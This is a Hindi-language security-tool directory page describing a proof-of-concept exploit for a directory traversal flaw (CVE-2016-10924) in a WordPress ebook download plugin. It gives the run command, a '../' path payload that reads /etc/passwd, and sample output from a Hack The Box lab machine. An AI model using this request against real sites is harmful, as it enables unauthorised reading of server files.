Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2016-10924-POC — Proof-of-Concept (PoC) एक्सप्लॉइट स्क्रिप्ट जो WordPress प्लगइन ebook-download (संस्करण < 1.2) में पाई गई Directory Traversal भेद्यता (CVE-2016-10924) के लिए है। यह भेद्यता एक क्राफ्टेड GET अनुरोध के माध्यम से अनधिकृत फ़ाइल पठन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/alealeluyah/cve-2016-10924-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Proof-of-Concept (PoC) एक्सप्लॉइट स्क्रिप्ट जो WordPress प्लगइन ebook-download (संस्करण < 1.2) में पाई गई Directory Traversal भेद्यता (CVE-2016-10924) के लिए है। यह भेद्यता एक क्राफ्टेड GET अनुरोध के माध्यम से अनधिकृत फ़ाइल पठन की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2016-10924-POC

इस रिपॉज़िटरी में Directory Traversal भेद्यता (CVE-2016-10924) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट स्क्रिप्ट है, जो WordPress प्लगइन ebook-download (संस्करण < 1.2) में पाई गई थी।

यह भेद्यता एक क्राफ्टेड GET अनुरोध के माध्यम से अनधिकृत फ़ाइल पठन की अनुमति देती है। यह एक्सप्लॉइट लक्ष्य सर्वर पर डायरेक्ट्री ट्रैवर्सल करने के लिए ebookdownloadurl नामक पैरामीटर का उपयोग करता है।

विवरण

  • CVE-ID: CVE-2016-10924
  • भेद्यता प्रकार: Directory Traversal
  • प्रभावित घटक: WordPress के लिए ebook-download प्लगइन < 1.2
  • प्रभाव: दूरस्थ हमलावर ebookdownloadurl पैरामीटर में फ़ाइल पथ में हेरफेर करके अंतर्निहित ऑपरेटिंग सिस्टम पर /etc/passwd जैसी मनमानी फ़ाइलें पढ़ सकते हैं।

नोट: यह PoC केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस जानकारी का दुरुपयोग कानूनी परिणामों का कारण बन सकता है।

आवश्यकताएँ

  • Python 3.
  • requests लाइब्रेरी (pip install requests से इंस्टॉल करें)

उपयोग

  1. रिपॉज़िटरी क्लोन करें:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. निर्भरताएँ इंस्टॉल करें:

    root@kitploit:~
    pip install requests
    
  3. एक्सप्लॉइट चलाएँ:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. पढ़ने के लिए फ़ाइल पथ निर्दिष्ट करें: स्क्रिप्ट लॉन्च करने के बाद, आपसे फ़ाइल पथ पूछा जाएगा। उदाहरण के लिए:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    लक्ष्य वातावरण में वेबरूट स्थान के आधार पर आपको ../ की संख्या समायोजित करने की आवश्यकता हो सकती है।

  5. बाहर निकलें:

    • बाहर निकलने के लिए exit, quit टाइप करें, या खाली प्रॉम्प्ट पर Enter दबाएँ।
    • स्क्रिप्ट को तुरंत रोकने के लिए Ctrl + C दबाएँ।

उदाहरण

मैंने इस एक्सप्लॉइट का उपयोग "Backdoor" पर किया, जो एक सेवानिवृत्त Hack The Box मशीन है:

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और वैध सुरक्षा परीक्षण उद्देश्यों के लिए है।
इस रिपॉज़िटरी में मौजूद जानकारी या स्क्रिप्ट का उपयोग किसी भी ऐसी प्रणाली पर न करें जिसके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
इस टूल के कारण हुए किसी भी दुरुपयोग या क्षति के लिए लेखक और योगदानकर्ता जिम्मेदार नहीं हैं।

लाइसेंस

यह प्रोजेक्ट GNU 2.0 लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। इसे उपयोग और संशोधित करने के लिए स्वतंत्र महसूस करें, लेकिन कृपया श्रेय दें।


संदर्भ

  • NVD - CVE-2016-10924
  • WordPress Plugin ebook-download (कमजोर संस्करणों के संदर्भ के लिए)
टूल डाउनलोड करें